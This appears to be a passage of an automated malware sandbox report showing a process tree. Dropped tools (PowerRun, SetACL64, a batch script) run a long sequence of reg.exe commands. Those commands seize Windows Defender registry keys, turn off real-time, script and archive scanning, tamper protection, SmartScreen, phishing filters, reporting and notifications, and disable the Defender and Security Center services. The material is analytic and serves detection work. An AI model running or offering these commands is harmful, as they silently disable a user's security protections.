C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:4316
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:2996
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
PID:2956 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:2084
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:4956
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"7⤵PID:4560
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')7⤵
- Executes dropped EXE
PID:316
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')7⤵PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do64.bat6⤵PID:3724
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
PID:1980
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3840
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"7⤵PID:4464
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵
- Executes dropped EXE
- Windows security modification
- Modifies data under HKEY_USERS
PID:1076
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"7⤵
- Windows security modification
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:508
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"7⤵PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:2996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f7⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f7⤵
- Modifies security service
PID:3860
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f7⤵PID:744
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f7⤵PID:944
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f7⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4316
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f7⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f7⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f7⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f7⤵PID:4532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f7⤵
- Executes dropped EXE
PID:3584
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:4252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f7⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:4264
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f7⤵PID:2996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f7⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f7⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f7⤵PID:4080
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f7⤵PID:944
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f7⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f7⤵PID:3028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f7⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f7⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f7⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:4600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f7⤵
- Executes dropped EXE
PID:4532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f7⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f7⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f7⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:4288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f7⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f7⤵
- Executes dropped EXE
PID:2252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f7⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f7⤵
- Modifies security service
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4140
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2032
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f7⤵
- Modifies security service
- Executes dropped EXE
PID:2996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f7⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f7⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f7⤵PID:4080
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f7⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f7⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f7⤵PID:2592
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f7⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f7⤵
- Executes dropped EXE
PID:312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f7⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f7⤵
- Executes dropped EXE
PID:2696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f7⤵PID:488
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:3188
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f7⤵PID:4956
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f7⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f7⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f7⤵
- Modifies security service
PID:2464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f7⤵PID:4560
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f7⤵PID:4152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f7⤵PID:3200
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f7⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f7⤵PID:3028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f7⤵
- Executes dropped EXE
PID:3840
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f7⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender notification settings
PID:2700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender notification settings
PID:944
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender notification settings
PID:4064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f7⤵PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:4152
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5780
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5984
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5808
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies data under HKEY_USERS
PID:6036 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5168
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5252
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5480
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5588
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5760
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5800
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5792
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:6020
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5932
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5260
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:6100
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5168
-
